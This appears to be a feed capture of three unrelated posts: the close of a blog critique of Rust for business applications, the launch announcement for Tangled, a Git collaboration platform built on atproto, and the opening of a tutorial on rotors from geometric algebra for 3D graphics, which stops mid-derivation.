  • Performance ceiling which means how possibly fast program written in a given language can be. This is usually low for dynamic languages (since they abstract a lot) but it's very high for Rust. However some platforms, i.e.. .NET or Swift where we can choose to work closer to the metal if we want to, this difference is not that significant.
  • Time to performance which basically means: "how long it takes to solve a problem with acceptable performance". And personally: Rust falls behind many managed languages on that metric, mainly because of things like borrow checker, and multi-threading issues etc. which I cover later.

Your business app will probably be working over things like strings, byte buffers and object graphs to carry over business data between DB and web framework. This will mean that it will move and copy a lot of data around: something that default Rust primitives are not particularly great at ie. String::clone in Rust uses deep copy (where in managed languages it's just pointer copy), while String itself is just wrapper around capacity-bound Vec<u8> which means they may also be bigger than they need to be.

Copying "references" can be much more expensive than in languages with managed memory because of ref-based garbage collector: i.e. for Vec<Arc<T>> means not only memcpy over vector heap space but also following increment of ref counters in every of the nested Arc pointers (including loading each of them from heap into register and coordinating new counter values between CPU caches).

And since we're at Arc/Rc or even Box: once you need to deal with graphs of objects or moving data in between coroutines or threads, you'll see yourself using them quite a lot. The problem is that this technique of allocating is nowhere near as fast as bump pointer allocators that managed languages use. The actual win here is when we need to release memory: which in Rust doesn't introduce GC pauses. However modern runtimes i.e. Go or Java Z collector, can provide a constrained GC pauses that let us keep the latency in check to avoid pathological cases (which is fine enough for most business apps, except maybe HFT space). Moreover they can offset memory release to background threads, which is not the case in Rust and for big object graphs can also affect latency.

And while technically Rust memory footprint would be expected to be lower, in practice that doesn't have to be the case (because of all the deep copying of heap objects and the fact that many of Rust pointers are pinned, causing fragmentation).

Rust is NOT good for multi-threaded apps

Some developers like to claim that - thanks to its strict borrow checker - Rust makes multi-threaded programming safe and reliable. This statement could probably hold in comparison against languages like C/C++, but once again it easily falls apart once you compare it against any of the contenders we described already.

.await pain

First problem is: building multi-threaded apps in Rust is simply painful. 2/3 of this pain comes from the fact that if you ever will have to do it, you'll most probably be put to work with async/await and tokio runtime.

Once you need to work with Rust futures and async code, you'll get exposed to whole new world of dosing micro-complexities into your brain, i.e.:

  • How you cannot just access objects and their fields, but have to work with pinning and Unpin.
  • How to build async iterators: because while async_stream is there, from time to time you'll have to roll something by hand: and it's much harder process than any other language supporting this feature that I know of.
  • Differences between regular threads/locks, and their asynchronous equivalents.
  • Why the hell do you need async_trait and why it's even configurable.
  • How Send and Sync makes each of the issues above exponentially harder than they already are.
  • And how the fact that you have pluggable runtimes - and sometimes need to use more than one in your app, i.e.. tokio+rayon - makes things even more interesting.

I think that this blog post is a good critique of current state of async Rust.

If you're going to pass your objects across threads, Rust forces some constrains over the code you're writing - such as Send + 'static limitations - even if that code is executed in only a single execution scope at the time. The problem is that in tokio - a dominant runtime used in Rust ecosystem - a primary way of parallelizing work is via spawn method, that uses work-stealing scheduler: which moves the suspended executions from busy to idle threads as it seems fit. This usually requires ensuring that most of your async code base is Send + 'static compatible.

What's nice about Send and Sync traits is that they are inferred from bodies of async methods that you implement. What's not nice is that they are not immediately visible, so you may accidentally break API guarantees by changing few lines somewhere down in a method call stack without even noticing, resulting in your methods no longer being forkable by tokio::spawn.

Locks. Locks everywhere.

In practice all of the Send + 'static' constraints mentioned above mean that all kinds of shared data now needs to be wrapped with Arc<Mutex<T>>/ Arc<RwLock<T>>. But which mutexes and locks are we talking about?:

  • Of course since std::sync::RwLock is basically a wrapper around OS primitives, it makes it very heavy. Most notably it doesn't cover async/await API, so it's going to block the threads from tokio thread pool, which is damaging for a server performance.
  • parking_lot::RwLocks are much more lightweight - since they use optimistic locking with atomic counters. They still don't offer async/await API though, potentially blocking thread pool in the process.
  • futures_locks::RwLock which sounds like a good idea if you aim for have runtime-agnostic async locks, until you look into the implementation and realize that it's just bait and the whole thing is using regular locks inside.
  • Tokio has its own RwLock which offers async/await API but it comes with some caveats, like:
    • If you use blocking lock methods inside of a context in which tokio runtime is available, it will straight up panic, crashing your app. And sometimes you just may have to call it in a context where runtime is available but your code cannot be async, calling for another layer of workarounds.
    • It doesn't offer reentrancy or upgradeable locks (promoting read locks into write ones).
  • Finally async_lock::RwLock which offers async/await API, optimal implementation, lock upgrades and doesn't crash your server because the author didn't like the way you're using his library. PS: don't worry I don't like it either, but I'm here to do what I can with what I have in hands, not to write poetry.

So once you finally get your PhD from lock algorithms in Rust, you finally are at the level where you can do the job as efficiently as Go dev after learning the whole language in 2 hours. And god forbid ask yourself a question: why do I need to use locks if this code is never accessed concurrently?

The best part is that - unlike ie. Pony - Rust compiler doesn't guarantee absence of dead locks in your code. Even better: since locks are so wide spread, they are even more likely to occur. It doesn't even have to happen because you're using them wrong, just because you didn't know that the code that you're calling is using them somewhere below (sending changes over tokio::watch channel itself is a great example of that).

Actors

One of the stunning issues I've found in Rust is that, given how well borrow-checker ownership matches the actor model, the actor libraries in Rust are lacking. I'm not talking about all of them, since I didn't have a time nor energy to check out every out of 47 actor libraries listed for a good start, but that number strongly suggests syndrome where after first few every new attempt was trying to solve some issues with existing implementation, creating new ones in the process. If you're using them for your business app, most likely it will be one of the 3 most popular, and most likely it will be actix, because you've been baited by its popularity and pretty mature web framework attached to it.

The problem with Actix is that its core has been defined before the era of async/await Rust. This means that it doesn't natively support async actor methods - and if you need a server app doing any kind of I/O, you WILL have to use async Rust eventually. Eventually some support for async had been added, but now you need to educate yourself which of the 4 different responses that suport futures should be used in which situation. AFAIK none of these support using &mut self actor in async method (and we don't count actix_async_handler since it has list of limitations longer than the actual documentation). It's about as handy as using a knife with 4 different blades but no handle.

In practice, the most popular pattern I've seen was simply using a tokio channel combined with tokio::spawn, which essentially is a retarded cusin of actor: more verbose and missing all of its benefits like structured message handling, lifecycle management, state encapsulation, parent-children hierarchies etc.

Panics

While Rust errors are pretty safe - thanks to being a part of method declaration - they are not alone: panics are still there. And unlike errors, you'll never be 100% sure that you're avoided all of them. Technically you could use some way to notify about their existence i.e.. by using unsafe brackets or something, but in practice it's hard to be sure.

One of the issues are ever-present .unwrap calls. Technically they are meant to be used with caution, but if you're glossing over the code base, the only difference between hash_map.get().unwrap() (which can happen often) and path_buf.to_str().unwrap() (which most likely will never happen in your app) is your experience.

Other issues include:

  • Panics on index accesses.
  • Panics of double borrow/borrow_mut from RefCells - which are perfectly fine in many languages but in Rust will crash your entire app because borrow checker doesn't like second guesses.
  • Panics with stack overflows because the state machines generated by your async methods may be a "bit" bigger than expected: but at least no code has been heap-alloc'ed while solving this problem.

What's important to notice here: we're talking about panics that will crash your server, affecting not only the current request handle but everyone using your services. That's the major difference between Rust failures and exceptions used in managed languages. And sure you could say that these can be fixed with proper programmer discipline, but isn't the Rust promise of compiler taking care of dangerous coding mistakes the reason why we put and effort to learn it and deal with all of the borrow-checker bullshit along the way?

Death by a thousand cuts

Individually the issues above can often be easily solved with some of the experience, and casted off as a "skill issue". But together they build up into developer's mental fatigue: you're here to solve business problems, yet on every step you need to solve "plumbing issues", make decisions about memory model including possible feature changes and refactoring they'll require in the future. Each one of them is considered crucial by borrow checker to a point where it either cause compilation error or runtime panic.

There are places where fine-grained control over program memory and performance tuning is beneficial and can be one of the business goals: these are things from broad area of system engineering. However for your daily ERP app the complexity coming from trying to reflect real-life interactions with all their exceptionality and imprecisions is enough: you're not going to be praised because your asset management app takes 10% less CPU while the task backlog has doubled in the meantime.

So if you're a founder or developer thinking if you should use Rust for your next business project because some crypto start-up is developing their quasi-bank in it and it would look nice in your resume, please think twice and don't make regrettable decision for yourself and your colleagues.

]]>
https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ hacker-news-small-sites-43234568 Sun, 02 Mar 2025 20:16:53 GMT
<![CDATA[Show HN: Tangled – Git collaboration platform built on atproto]]> thread link) | @icy
March 2, 2025 | https://blog.tangled.sh/intro | archive.org

Tangled is a new social-enabled Git collaboration platform, built on top of the AT Protocol. We envision a place where developers have complete ownership of their code, open source communities can freely self-govern and most importantly, coding can be social and fun again.

There are several models for decentralized code collaboration platforms, ranging from ActivityPub’s (Forgejo) federated model, to Radicle’s entirely P2P model. Our approach attempts to be the best of both worlds by adopting atproto—a protocol for building decentralized social applications with a central identity.

tangled architecture

Our approach to this is the idea of “knots”. Knots are lightweight, headless servers that enable users to host Git repositories with ease. Knots are designed for either single or multi-tenant use which is perfect for self-hosting on a Raspberry Pi at home, or larger “community” servers. By default, Tangled provides managed knots where you can host your repositories for free.

The App View at tangled.sh acts as a consolidated “view” into the whole network, allowing users to access, clone and contribute to repositories hosted across different knots—completely seamlessly.

Tangled is still in its infancy, and we’re building out several of its core features as we dogfood it ourselves. We developed these three tenets to guide our decisions:

  1. Ownership of data
  2. Low barrier to entry
  3. No compromise on user-experience

Collaborating on code isn’t easy, and the tools and workflows we use should feel natural and stay out of the way. Tangled’s architecture enables common workflows to work as you’d expect, all while remaining decentralized.

We believe that atproto has greatly simplfied one of the hardest parts of social media: having your friends on it. Today, we’re rolling out invite-only access to Tangled—join us on IRC at #tangled on libera.chat and we’ll get you set up.

]]>
https://blog.tangled.sh/intro hacker-news-small-sites-43234544 Sun, 02 Mar 2025 20:14:15 GMT
<![CDATA[Rotors: A practical introduction for 3D graphics (2023)]]> thread link) | @bladeee
March 2, 2025 | https://jacquesheunis.com/post/rotors/ | archive.org

When putting 3D graphics on a screen, we need a way to express rotations of the geometry we’re rendering. To avoid the problems that come with storing rotations as axes & angles, we could use quaternions. However quaternions require that we think in 4 distinct spatial dimensions, something humans are notoriously bad at. Thankfully there is an alternative that some argue is far more elegant and simpler to understand: Rotors.

Rotors come from an area of mathematics called geometric algebra. Over the past few years I’ve seen a steady increase in the number of people claiming we should bin quaternions entirely in 3D graphics and replace them with rotors. I know nothing about either so I figured I’d try out rotors. I struggled to find educational materials online that clicked well with how I think about these things though, so this post is my own explanation of rotors and the surrounding mathematical concepts. It’s written with the specific intention of implementing rotation for 3D graphics and is intended to be used partly as an educational text and partly as a reference page.

There are two sections: The first half is purely theoretical, where we’ll look at where rotors “come from”, investigate how they behave and see how we can use them to perform rotations. The second half will cover practical applications and includes example code for use-cases you’re likely to encounter in 3D graphics.

A word on notation

\(\global\def\v#1{\mathbf{#1}}\)

In this post we will write vectors, bivectors and trivectors in bold and lower-case (e.g \(\v{v}\) is a vector). Rotors will be written in bold and upper-case (e.g \(\v{R}\) is a rotor).

The basis elements of our 3D space are denoted \(\v{e_1, e_2, e_3}\), so for example \(\v{v} = v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}\).

Where multiplication tables are given, the first argument is the entry on the far left column of the table and the second argument is the entry on the top row of the table.

Since this post is primarily concerned with 3D graphics & simulation, we will restrict our examples to 3 dimensions of space. Rotors (unlike quaternions) can easily be extended to higher dimensions but this is left as an exercise for the reader.

Introducing: The wedge product

We begin our journey by defining a new way to combine two vectors: the so-called “wedge product”, written as \(\v{a \wedge b}\). We define the wedge product of two vectors as an associative product that distributes over addition and which is zero when both arguments are the same:

\[\begin{equation} \v{v \wedge v} = 0 \tag{ 1 } \end{equation} \]

From this we can show that the wedge product is also anticommutative:

\(\v{(a \wedge b) = -(b \wedge a)}\)

Given vectors \(\v{a}\) and \(\v{b}\): \[ \begin{aligned} (\v{a + b}) \wedge (\v{a + b}) &= 0 \\ (\v{a \wedge a}) + (\v{a \wedge b}) + (\v{b \wedge a}) + (\v{b \wedge b}) &= 0 \\ 0 + (\v{a \wedge b}) + (\v{b \wedge a}) + 0 &= 0 \\ (\v{a \wedge b}) &= -(\v{b \wedge a}) \end{aligned} \]

We have yet to specify how to actually “compute” a wedge product though. We know that it produces zero when both arguments are equivalent but what if they aren’t? In this case we “compute” the wedge product by expressing the arguments in terms of its basis elements and multiplying out.

When it comes down to a pair of basis vectors we just leave them be. So for example we don’t simplify \(\v{e_1} \wedge \v{e_2}\) any further. This is because \(\v{e_1} \wedge \v{e_2}\) is not a vector. It’s a new kind of entity called a bivector. If you think of an ordinary a vector as a point (offset from the origin), then the bivector produced by applying the wedge product to those two vectors can be visualised as the infinite plane containing the origin and those two points. Equivalently, you can think of a bivector as the direction that is normal to the plane formed by the two vectors that we wedged together. The bivector \(\v{e_1 \wedge e_2}\) is in some sense the normal going in the same direction as the vector \(\v{e_3}\).

In the same way that we have basis vectors (\(\v{e_1}, \v{e_2}, \v{e_3})\), we also have basis bivectors: \(\v{e_{12}}, \v{e_{23}}, \v{e_{31}}\). Conveniently, these bivector basis elements are simple wedge products of the vector basis elements: \[ \v{e_{12}} = \v{e_1} \wedge \v{e_2} \\ \v{e_{23}} = \v{e_2} \wedge \v{e_3} \\ \v{e_{31}} = \v{e_3} \wedge \v{e_1} \]

Note that (as with vectors) we’re not restricted to a specific set of basis bivectors. Some texts prefer to use \(\v{e_{12}}, \v{e_{13}}, \v{e_{23}}\). The calculations work out a little differently but the logic is the same. For this post we’ll use \(\v{e_{12}}, \v{e_{23}}, \v{e_{31}}\) throughout. An important thing to note is that the 3-dimensional case is a little misleading here. It is very easy to confuse vectors with bivectors because they have the same number of basis elements. This is not true in higher dimensions. In 4-dimensional space, for example, there are 4 basis vectors but 6 basis bivectors so we should always explicitly state what basis elements we’re using in our calculations.

One last realisation is that in 3D we can go one step further. On top of vectors (representing lines) and bivectors (representing planes), we also have trivectors, which represent volumes. Trivectors are as far as we can go in 3D though because the space itself is 3-dimensional, there’s no room for more dimensions! Trivectors in 3D are sometimes referred to as “pseudoscalars” since they have only 1 basis element: \(\v{e_{123}}\). Trivectors in 3D are oriented (in the sense that the coefficient of the trivector basis element can be negative) but otherwise contain no positional information.

Below is a multiplication table for the wedge product of our 3D basis vectors:

\[\begin{array}{c|c:c:c} \wedge & \v{e_1} & \v{e_2} & \v{e_3} \\ \hline \v{e_1} & 0 & \v{e_{12}} & -\v{e_{31}} \\ \v{e_2} & -\v{e_{12}} & 0 & \v{e_{23}} \\ \v{e_3} & \v{e_{31}} & -\v{e_{23}} & 0 \\ \end{array}\]

Wedge product of non-basis vectors

Let us see what happens if we wedge together two arbitrary 3D vectors in the above manner:

\(\v{v \wedge u} = (v_1u_2 - v_2u_1)\v{e_{12}} + (v_2u_3 - v_3u_2)\v{e_{23}} + (v_3u_1 - v_1u_3)\v{e_{31}}\)

Given vectors \(\v{v} = v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}\) and \(\v{u} = u_1\v{e_1} + u_2\v{e_2} + u_3\v{e_3}\):

\[ \begin{align*} \v{v \wedge u} &= (v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \wedge (u_1\v{e_1} + u_2\v{e_2} + u_3\v{e_3}) \\ \v{v \wedge u} &= (v_1\v{e_1} \wedge u_1\v{e_1}) + (v_1\v{e_1} \wedge u_2\v{e_2}) + (v_1\v{e_1} \wedge u_3\v{e_3}) \tag{distribute over +}\\ &+ (v_2\v{e_2} \wedge u_1\v{e_1}) + (v_2\v{e_2} \wedge u_2\v{e_2}) + (v_2\v{e_2} \wedge u_3\v{e_3}) \\ &+ (v_3\v{e_3} \wedge u_1\v{e_1}) + (v_3\v{e_3} \wedge u_2\v{e_2}) + (v_3\v{e_3} \wedge u_3\v{e_3}) \\ \v{v \wedge u} &= v_1u_1(\v{e_1 \wedge e_1}) + v_1u_2(\v{e_1 \wedge e_2}) + v_1u_3(\v{e_1 \wedge e_3}) \tag{pull out coefficients}\\ &+ v_2u_1(\v{e_2 \wedge e_1}) + v_2u_2(\v{e_2 \wedge e_2}) + v_2u_3(\v{e_2 \wedge e_3}) \\ &+ v_3u_1(\v{e_3 \wedge e_1}) + v_3u_2(\v{e_3 \wedge e_2}) + v_3u_3(\v{e_3 \wedge e_3}) \\ \v{v \wedge u} &= 0 + v_1u_2\v{e_{12}} - v_1u_3\v{e_{31}} \\ &- v_2u_1\v{e_{12}} + 0 + v_2u_3\v{e_{23}} \\ &+ v_3u_1\v{e_{31}} - v_3u_2\v{e_{23}} + 0 \\ \v{v \wedge u} &= (v_1u_2 - v_2u_1)\v{e_{12}} + (v_2u_3 - v_3u_2)\v{e_{23}} + (v_3u_1 - v_1u_3)\v{e_{31}} \\ \end{align*} \]

Well now, those coefficients look awfully familiar don’t they? They’re exactly the coefficients of the usual 3D cross-product.1 This lines up with our earlier claim that bivectors function as normals: If you look at which coefficients go with which bivector basis elements, you’ll see that the coefficient for \(\v{e_{23}}\) is the same as the coefficient of \(\v{x}\) in the usual 3D cross-product.

By virtue of “sharing” the equation for 3D vector cross product, we can conclude that the magnitude of the bivector \(\v{v \wedge u}\) is equal to the area of the parallelogram formed by \(\v{v}\) and \(\v{u}\). A neat geometric proof of this (with diagrams) can be found on the mathematics Stack Exchange. The sign of the area indicates the winding order of the parallelogram, although which direction is positive and which is negative will depend on the handedness of your coordinate system.

Like vectors, bivectors can be written as the sum of some basis elements each multiplied by some scalar. It may not come as a surprise then that as with vectors, adding two bivectors together is simply a matter of adding each of the constituent components.

So we have vector addition and bivector addition. Can we add a vector to a bivector? Yes, but we leave them as separate terms. In the same way that we don’t try to “simplify” \(\v{e_1 + e_2}\), we also don’t try to simplify \(\v{e_1 + e_{12}}\). We just leave them as the sum of these two different entities. The resulting object is neither a vector nor a bivector, but is a more general object called a “multivector”. A multivector is just a sum of scalars, vectors, bivectors, trivectors etc. All scalars, vectors, bivectors etc are also multivectors, except that they only have non-zero coefficients on one “type” of basis element. So for example you could write the vector \(\v{e_1}\) as the multivector \(\v{e_1} + 0\v{e_{12}}\).

Multivectors are particularly relevant to the discussion of our second new operation and the protagonist of this post:

Geometric product

The geometric product is defined for arbitrary multivectors, is associative, and distributes over addition. Somewhat annoyingly (in an environment involving several types of products), it is denoted with no symbol, as just \(\v{ab}\). If we have two vectors \(\v{a}\) and \(\v{b}\), we can calculate their geometric product as:

\[\begin{equation} \v{ab = (a \cdot b) + (a \wedge b)} \tag{ 2 } \end{equation} \]

Where \(\cdot\) is the usual dot product we know from traditional linear algebra. Note that if both inputs are the same then by equation 1 we get:

\[\begin{equation} \v{aa} = \v{a \cdot a} \tag{ 3 } \end{equation} \]

This, and the fact that our basis vectors are all unit-length and perpendicular to one another leads us to: \(\v{e_ie_i} = \v{e_i} \cdot \v{e_i} = 1\) and \(\v{e_ie_j} = 0 + \v{e_i} \wedge \v{e_j} = -\v{e_je_i} ~~~\forall i \neq j\).

In particular this means that \(\v{e_1e_2} = \v{e_1 \wedge e_2} = \v{e_{12}}\) (and similarly for the other basis bivectors). Indeed basis bivectors being the wedge product of basis vectors is now revealed to be a special case of being the geometric product of basis vectors. This leads us to an analogous definition for trivectors: \(\v{e_{123}} = \v{e_1e_2e_3}\).

At this point we can compute a complete multiplication table for the geometric product with basis elements in 3D:

\[\begin{array}{c|c:c:c:c:c:c:c:c} \cdot\wedge & \v{e_1} & \v{e_2} & \v{e_3} & \v{e_{12}} & \v{e_{31}} & \v{e_{23}} & \v{e_{123}} \\ \hline \v{e_1} & 1 & \v{e_{12}} & -\v{e_{31}} & \v{e_2} & -\v{e_3} & \v{e_{123}} & \v{e_{23}} \\ \v{e_2} & -\v{e_{12}} & 1 & \v{e_{23}} & -\v{e_1} & \v{e_{123}} & \v{e_3} & \v{e_{31}} \\ \v{e_3} & \v{e_{31}} & -\v{e_{23}} & 1 & \v{e_{123}} & \v{e_1} & -\v{e_2} & \v{e_{12}} \\ \v{e_{12}} & -\v{e_2} & \v{e_1} & \v{e_{123}} & -1 & \v{e_{23}} & -\v{e_{31}} & -\v{e_3} \\ \v{e_{31}} & \v{e_3} & \v{e_{123}} & -\v{e_1} & -\v{e_{23}} & -1 & \v{e_{12}} & -\v{e_2} \\ \v{e_{23}} & \v{e_{123}} & -\v{e_3} & \v{e_2} & \v{e_{31}} & -\v{e_{12}} & -1 & -\v{e_1} \\ \v{e_{123}} & \v{e_{23}} & \v{e_{31}} & \v{e_{12}} & -\v{e_3} & -\v{e_2} & -\v{e_1} & -1 \\ \end{array}\]

Some multiplication table entries derived In case it's not clear how we can arrive at some of the values in the table above, here are some worked examples: \[ \v{e_1e_3} = \v{e_1 \wedge e_3} = -(\v{e_3 \wedge e_1}) = -\v{e_{31}} \\ \v{e_1e_{12}} = \v{e_1(e_1e_2)} = \v{(e_1e_1)e_2} = 1\v{e_2} = \v{e_2} \\ \v{e_3e_{12}} = \v{e_3e_1e_2} = -\v{e_1e_3e_2} = \v{e_1e_2e_3} = \v{e_{123}} \\ \v{e_{12}e_{12}} = (\v{e_1e_2})(\v{e_1e_2}) = (-\v{e_2e_1})(\v{e_1e_2}) = -\v{e_2}(\v{e_1e_1})\v{e_2} = -\v{e_2e_2} = -1 \\ \v{e_{123}e_{2}} = \v{(e_1e_2e_3)e_2} = -(\v{e_1e_3e_2})\v{e_2} = -\v{e_1e_3}(\v{e_2e_2}) = -\v{e_1e_3} = \v{e_3e_1} = \v{e_{31}}\\ \]

To compute the geometric product of two arbitrary multivectors, we can break the arguments down into their constituent basis elements and manipulate only those (using the multiplication table above). We need to do this because equations 2 and 3 above apply only to vectors, and do not apply to bivectors (or trivectors etc).

Inverses under the geometric product

Under the geometric product all non-zero vectors \(\v{v}\) have an inverse:

\[\begin{equation} \v{v}^{-1} = \frac{\v{v}}{|\v{v}|^2} \tag{ 4 } \end{equation} \]

Proof: \(\v{v}^{-1} = \frac{\v{v}}{|\v{v}|^2}\) Given a vector \(\v{v} \neq 0\) let's take \(\v{v^\prime} = \frac{\v{v}}{|\v{v}|^2}\), then: \[\begin{aligned} \v{vv^\prime} &= \v{v \cdot v^\prime + v \wedge v^\prime} \\ \v{vv^\prime} &= \frac{1}{|\v{v}|^2}(\v{v \cdot v}) + \frac{1}{|\v{v}|^2}(\v{v \wedge v}) \\ \v{vv^\prime} &= \frac{1}{|\v{v}|^2}|\v{v}|^2 + \frac{1}{|\v{v}|^2}0 \\ \v{vv^\prime} &= \frac{|\v{v}|^2}{|\v{v}|^2} \\ \v{vv^\prime} &= 1 \\ \end{aligned}\] and similarly if we multiply on the left side: \[\begin{aligned} \v{v^\prime v} &= \v{v^\prime \cdot v + v^\prime \wedge v} \\ \v{v^\prime v} &= \frac{1}{|\v{v}|^2}(\v{v \cdot v}) + \frac{1}{|\v{v}|^2}(\v{v \wedge v}) \\ \v{v^\prime v} &= \frac{1}{|\v{v}|^2}|\v{v}|^2 + \frac{1}{|\v{v}|^2}0 \\ \v{v^\prime v} &= \frac{|\v{v}|^2}{|\v{v}|^2} \\ \v{v^\prime v} &= 1 \\ \end{aligned}\] So \(\v{v^\prime} = \frac{\v{v}}{|\v{v}|^2} = \v{v^{-1}}\), the inverse of \(\v{v}\).

Similarly, the geometric product of two vectors \(\v{a}\) and \(\v{b}\) also has an inverse:

\[\begin{equation} (\v{ab})^{-1} = \v{b}^{-1}\v{a}^{-1} \tag{ 5 } \end{equation} \]

Proof: \((\v{ab})^{-1} = \v{b}^{-1}\v{a}^{-1}\) Given any two vectors \(\v{a}\) and \(\v{b}\) then we can multiply on the right: \[ (\v{ab})(\v{b}^{-1}\v{a}^{-1}) = \v{a}(\v{bb}^{-1})\v{a}^{-1} = \v{a}(1)\v{a}^{-1} = \v{aa}^{-1} = 1 \] and on the left: \[ (\v{b}^{-1}\v{a}^{-1})(\v{ab}) = \v{b}^{-1}(\v{a}^{-1}\v{a})\v{b} = \v{b}^{-1}(1)\v{b} = \v{b}^{-1}\v{b} = 1 \] and conclude that \(\v{b}^{-1}\v{a}^{-1} = (\v{ab})^{-1}\), the (left and right) inverse of \(\v{ab}\).

Since every vector has an inverse, for any two vectors \(\v{a}\) and \(\v{b}\) we can write: \[\begin{aligned} \v{a} &= \v{a} \\ \v{a} &= \v{abb}^{-1} \\ \v{a} &= \frac{1}{|\v{b}|^2} \v{(ab)b} \\ \v{a} &= \frac{1}{|\v{b}|^2} \v{(a \cdot b + a \wedge b) b} \\ \v{a} &= \frac{\v{a \cdot b}}{|\v{b}|^2} \v{b} + \frac{\v{a \wedge b}}{|\v{b}|^2} \v{b} \\ \end{aligned}\]

From this we conclude that for two arbitrary (non-zero) vectors \(\v{a}\) and \(\v{b}\), we can write one in terms of components parallel and perpendicular to the other:

\[\begin{equation} \v{a} = \v{a}_{\parallel b} + \v{a}_{\perp b} \tag{ 6 } \end{equation} \]

Where \(\v{a_{\parallel b}}\) is the component of \(\v{a}\) parallel to \(\v{b}\) (the projection of \(\v{a}\) onto \(\v{b}\)) and \(\v{a_{\perp b}}\) is the component of \(\v{a}\) perpendicular to \(\v{b}\) (the rejection of \(\v{a}\) from \(\v{b}\)). We know from linear algebra that

\[\begin{equation} \v{a_{\parallel b}} = \frac{\v{a \cdot b}}{|\v{b}|^2}\v{b} \tag{ 7 } \end{equation} \]

Substituting into the calculation above we get \(\v{a} = \v{a_{\parallel b}} + \frac{\v{a \wedge b}}{|\v{b}|^2} \v{b} \) from which we conclude that

\[\begin{equation} \v{a_{\perp b}} = \frac{\v{a \wedge b}}{|\v{b}|^2}\v{b} \tag{ 8 } \end{equation} \]

Reflections with the geometric product

Recall from linear algebra that given two non-zero vectors \(\v{a}\) and \(\v{v}\), we can write the reflection of \(\v{a}\) over \(\v{v}\) as:

\[ \v{a^\prime} = \v{a} - 2\v{a_{\perp v}} = \v{a}_{\parallel v} - \v{a}_{\perp v} \]

If we substitute equations 7 and 8 we get:

\[\begin{aligned} \v{a^\prime} &= \v{a}_{\parallel v} - \v{a}_{\perp v} \\ &= \frac{\v{v \cdot a}}{|\v{a}|^2} \v{a} - \frac{\v{v \wedge a}}{|\v{a}|^2} \v{a} \\ &= (\v{v \cdot a})\frac{\v{a}}{|\v{a}|^2} - (\v{v \wedge a})\frac{\v{a}}{|\v{a}|^2} \\ &= \v{(v \cdot a)a}^{-1} - (\v{v \wedge a})\v{a}^{-1} \\ &= \v{(a \cdot v)a}^{-1} + (\v{a \wedge v})\v{a}^{-1} \\ &= (\v{a \cdot v + a \wedge v})\v{a}^{-1} \\ &= \v{(av)a}^{-1} \\ \v{a^\prime} &= \v{ava}^{-1} \\ \end{aligned}\]

So we can reflect vectors using only the geometric product. \(\v{ava}^{-1}\) is a form we will see quite often, and is sometimes referred to as a “sandwich product”.

The first and last lines of the calculation above together demonstrate an important property: Since \(\v{ava}^{-1} = \v{a}_{\parallel v} - \v{a}_{\perp v}\), we know that \(\v{ava}^{-1}\) is just a vector and contains no scalar, bivector (or trivector etc) components. This means we can use the output of such a sandwich product as the input to another sandwich product, which we will do shortly.

For our own convenience, we can also produce an equation for the output of such a sandwich product:

Equation for 3D sandwich product \[\begin{align*} & \v{ava}^{-1} \\ =~& (\v{av})\v{a}^{-1} \\ =~& |a|^{-2} (\v{av})\v{a} \\ =~& |a|^{-2} (\v{(a \cdot v) + (a \wedge v)})\v{a} \\ =~& |a|^{-2} \lbrack \\ & (a_1v_1 + a_2v_2 + a_3v_3) \\ & + (a_1v_2 - a_2v_1)\v{e_{12}} \\ & + (a_2v_3 - a_3v_2)\v{e_{23}} \\ & + (a_3v_1 - a_1v_3)\v{e_{31}} \\ & \rbrack (a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ =~& |a|^{-2} \lbrack \\ & (a_1v_1 + a_2v_2 + a_3v_3)(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ & + (a_1v_2 - a_2v_1)\v{e_{12}}(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ & + (a_2v_3 - a_3v_2)\v{e_{23}}(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ & + (a_3v_1 - a_1v_3)\v{e_{31}}(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{multiply out the brackets on the right} \\ & (a_1v_1 + a_2v_2 + a_3v_3)a_1\v{e_1} + (a_1v_1 + a_2v_2 + a_3v_3)a_2\v{e_2} + (a_1v_1 + a_2v_2 + a_3v_3)a_3\v{e_3} \\ & + (a_1v_2 - a_2v_1)a_1\v{e_{12}}\v{e_1} + (a_1v_2 - a_2v_1)a_2\v{e_{12}}\v{e_2} + (a_1v_2 - a_2v_1)a_3\v{e_{12}}\v{e_3} \\ & + (a_2v_3 - a_3v_2)a_1\v{e_{23}}\v{e_1} + (a_2v_3 - a_3v_2)a_2\v{e_{23}}\v{e_2} + (a_2v_3 - a_3v_2)a_3\v{e_{23}}\v{e_3} \\ & + (a_3v_1 - a_1v_3)a_1\v{e_{31}}\v{e_1} + (a_3v_1 - a_1v_3)a_2\v{e_{31}}\v{e_2} + (a_3v_1 - a_1v_3)a_3\v{e_{31}}\v{e_3} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{simplify the basis element products} \\ & (a_1v_1 + a_2v_2 + a_3v_3)a_1\v{e_1} + (a_1v_1 + a_2v_2 + a_3v_3)a_2\v{e_2} + (a_1v_1 + a_2v_2 + a_3v_3)a_3\v{e_3} \\ & - (a_1v_2 - a_2v_1)a_1\v{e_2} + (a_1v_2 - a_2v_1)a_2\v{e_1} + (a_1v_2 - a_2v_1)a_3\v{e_{123}} \\ & + (a_2v_3 - a_3v_2)a_1\v{e_{123}} - (a_2v_3 - a_3v_2)a_2\v{e_3} + (a_2v_3 - a_3v_2)a_3\v{e_2} \\ & + (a_3v_1 - a_1v_3)a_1\v{e_3} + (a_3v_1 - a_1v_3)a_2\v{e_{123}} - (a_3v_1 - a_1v_3)a_3\v{e_1} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{multiply out the remaining brackets} \\ & a_1a_1v_1\v{e_1} + a_1a_2v_2\v{e_1} + a_3a_1v_3\v{e_1} \\ & + a_1a_2v_1\v{e_2} + a_2a_2v_2\v{e_2} + a_2a_3v_3\v{e_2} \\ & + a_3a_1v_1\v{e_3} + a_2a_3v_2\v{e_3} + a_3a_3v_3\v{e_3} \\ & - a_1a_1v_2\v{e_2} + a_1a_2v_1\v{e_2} + a_1a_2v_2\v{e_1} - a_2a_2v_1\v{e_1} + 